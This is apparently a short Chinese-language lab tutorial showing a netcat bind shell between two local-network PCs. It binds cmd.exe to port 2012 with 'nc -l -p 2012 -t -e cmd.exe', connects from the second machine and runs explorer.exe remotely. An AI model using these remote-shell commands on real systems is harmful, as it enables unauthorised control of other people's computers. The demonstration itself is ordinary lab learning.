一:两台局域网PC的信息和设置
通过cmd窗口可以看到用户名为:noise的PC-IP为:192.168.1.1; 注:该PC将作为远程PC被控制。
通过cmd窗口可以看到用户名为:CG的PC-IP为:192.168.1.2; 注:该PC将作为本地主机PC,用于控制远程PC。
在远程PC上运行: nc -l -p 2012 -t -e cmd.exe; 注:将远程PC的CMD绑定到2012端口。
在本地主机我们运行: nc -nvv 192.168.1.1 2012 此时cmd会自动检测并进行连接。 连接成功后,我们看到用户名为CG的本地PC,变成了用户名为:noise的远程PC用户名。
二:CMD正向连接测试
连接后,此时本机已经控制远程PC的CMD-Shell; 我们查看ip,发现现在显示的ip同样是远程PC的IP;
此时我们在本地主机输入:explorer.exe; 可以看到远程主机发生响应,打开了我的电脑中的-库-窗口。
三:断开正向连接
如果我们想要断开连接,两个主机的任意一个按下: ctrl+C; 均会看到两者几乎同时断开连接,用户名回归正常。